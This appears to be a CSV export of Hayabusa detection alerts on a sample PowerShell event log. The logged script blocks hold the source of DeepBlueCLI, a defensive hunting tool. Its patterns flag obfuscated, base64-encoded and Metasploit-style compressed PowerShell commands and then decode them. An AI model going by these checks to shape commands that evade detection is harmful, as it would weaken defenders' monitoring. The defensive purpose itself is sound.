$app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.910 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.979 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} 